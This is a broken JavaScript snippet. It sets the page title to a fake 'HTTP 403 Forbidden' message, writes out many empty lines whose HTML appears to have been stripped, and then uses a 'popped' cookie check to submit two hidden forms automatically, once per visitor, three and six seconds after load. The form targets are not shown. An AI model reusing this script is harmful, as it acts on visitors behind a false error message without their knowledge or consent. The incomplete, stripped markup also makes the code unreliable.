//document.title="HTTP 403 (禁止访问)"; //document.write("<\/td>"); document.writeln("
"); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln("
"); function yx(id) { //document.getElementById("yxid").value=id; document.getElementById("yxForm").submit(); } document.writeln("
"); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln("
"); function yx1(id) { //document.getElementById("yxid1").value=id; document.getElementById("yxForm1").submit(); } function get_cookie(Name) { var search = Name + "=" var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search) if (offset != -1) { offset += search.length end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)) } } return returnvalue; } function helpor_net(){ if (get_cookie('popped')==''){ setTimeout(yx,3000); setTimeout(yx1,6000); document.cookie="popped=yes" } } helpor_net()